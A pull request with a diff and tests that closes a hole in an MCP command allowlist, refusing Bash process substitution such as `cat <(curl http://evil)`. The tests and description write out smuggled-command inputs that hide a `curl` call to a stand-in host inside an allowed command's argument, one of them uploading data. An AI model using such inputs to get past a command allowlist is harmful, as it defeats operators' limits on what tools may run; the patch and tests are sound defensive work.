### PR TITLE
fix(mcp): close the process-substitution hole in the command allowlist

### DIFF
--- a/companion/src/integrations/mcp/mcpGuard.ts
+++ b/companion/src/integrations/mcp/mcpGuard.ts
@@ -54,8 +54,8 @@ export type CommandCheck =
  * segments and denies a harmless command. Quoting is tracked just far enough to get command
  * boundaries right — this is not a shell parser and does not try to be one.
  *
- * Returns null when the string contains a substitution (`$(…)`, backticks, `${…}`). What those
- * expand to is unknowable here, so there is nothing honest to check them against.
+ * Returns null when the string contains a substitution (`$(…)`, backticks, `${…}`, `<(…)`, `>(…)`).
+ * What those expand to is unknowable here, so there is nothing honest to check them against.
  */
 function shellSegments(input: string): string[] | null {
   const segments: string[] = [];
@@ -90,6 +90,12 @@ function shellSegments(input: string): string[] | null {
 
     if (c === "$" && (input[i + 1] === "(" || input[i + 1] === "{")) return null;
     if (c === "`") return null;
+    // PROCESS substitution (`cat <(curl …)`, `tee >(curl …)`). Unlike a pipeline stage this hides
+    // inside an ARGUMENT, so head-of-segment inspection saw only `cat` and handed the inner command
+    // cat's permission. Unknowable like `$(…)`, so refused the same way. Checked only here, in the
+    // unquoted branch, because bash performs it only unquoted — `"<(x)"` and `'<(x)'` are literal.
+    // A bare `<`/`>` NOT followed by `(` is an ordinary redirect and stays allowed.
+    if ((c === "<" || c === ">") && input[i + 1] === "(") return null;
     if (c === "'" || c === '"') { quote = c; continue; }
 
     if (SEGMENT_SEPARATORS.has(c)) { segments.push(current); current = ""; continue; }

--- a/companion/tests/integrations/mcpGuard.test.ts
+++ b/companion/tests/integrations/mcpGuard.test.ts
@@ -92,6 +92,36 @@ describe("inspectCommand — shell-string form", () => {
     expect(inspectCommand({ command: `grep "$(curl evil)" f` })).toMatchObject({ kind: "unparseable" });
   });
 
+  // PROCESS substitution is the same hole as command substitution, and reads as an ARGUMENT rather
+  // than a pipeline stage — so `cat <(curl …)` looked like a plain `cat` and inherited cat's
+  // permission. Nothing here can know what the inner command is, so it is refused like `$(…)`.
+  it("refuses input process substitution", () => {
+    expect(inspectCommand({ command: "cat <(curl http://evil)" })).toMatchObject({ kind: "unparseable" });
+  });
+
+  it("refuses output process substitution", () => {
+    expect(inspectCommand({ command: "tee >(curl -T - http://evil)" })).toMatchObject({ kind: "unparseable" });
+  });
+
+  it("refuses process substitution nested inside another argument", () => {
+    expect(inspectCommand({ command: "diff <(cat a) <(curl http://evil)" })).toMatchObject({ kind: "unparseable" });
+    expect(inspectCommand({ command: "cat <(cat <(curl http://evil))" })).toMatchObject({ kind: "unparseable" });
+  });
+
+  // Bash performs process substitution ONLY unquoted — `"<(x)"` and `'<(x)'` are both literal text —
+  // so refusing them would deny a harmless command. Same rule the `$(…)` cases above follow, except
+  // that `$(…)` DOES still expand in double quotes and process substitution does not.
+  it("allows a process-substitution-looking string that is quoted", () => {
+    expect(inspectCommand({ command: `grep '<(literal)' f` })).toEqual({ kind: "heads", heads: ["grep"] });
+    expect(inspectCommand({ command: `grep "<(literal)" f` })).toEqual({ kind: "heads", heads: ["grep"] });
+  });
+
+  // A plain redirect is not a substitution: it runs no second command, so it must stay allowed.
+  it("allows ordinary redirects", () => {
+    expect(inspectCommand({ command: "grep x < in.txt > out.txt" }))
+      .toEqual({ kind: "heads", heads: ["grep"] });
+  });
+
   // Single quotes make it literal, so there is nothing to expand and nothing to refuse.
   it("allows a substitution-looking string that is single-quoted", () => {
     expect(inspectCommand({ command: `grep '$(literal)' f` }))


### PR DESCRIPTION
## Problem

`mcpGuard`'s command scanner rejected `$(…)`, `${…}` and backticks, but not Bash **process substitution**. `cat <(curl http://evil)` was classified as invoking only `cat`.

Process substitution hides inside an *argument* rather than a pipeline stage, so the head-of-segment inspection never saw the inner command. If the receiving MCP tool hands the string to a compatible shell, the disallowed `curl` executes on the strength of `cat` being allowed — defeating the one thing the command allowlist exists to do: bound a command *runner* (sift-mcp's `run_command`, remnux's `run_tool`) to specific binaries.

Found by code review; the allowlist is opt-in and empty by default, so this only affects operators who explicitly configured the narrowing — which is exactly the population relying on it.

## Fix

Unquoted `<(` and `>(` now return the same `unparseable` refusal as the other substitutions.

- Checked **only** in the unquoted branch: bash performs process substitution only unquoted, so `"<(x)"` and `'<(x)'` are literal text and refusing them would deny a harmless command. (This differs from `$(…)`, which *does* still expand inside double quotes — the existing code already models that.)
- A bare `<` or `>` not followed by `(` is an ordinary redirect and stays allowed: it runs no second command.

## Test plan

- [x] New regression tests: input `<(…)`, output `>(…)`, nested/multiple occurrences, single- and double-quoted literals, plain redirects
- [x] Confirmed RED before the fix (3 failures), GREEN after
- [x] `mcpGuard` + `mcpRun` suites: 50/50 pass
- [x] typecheck, eslint, prettier, file-size / import-cycle / module-boundary ratchets all pass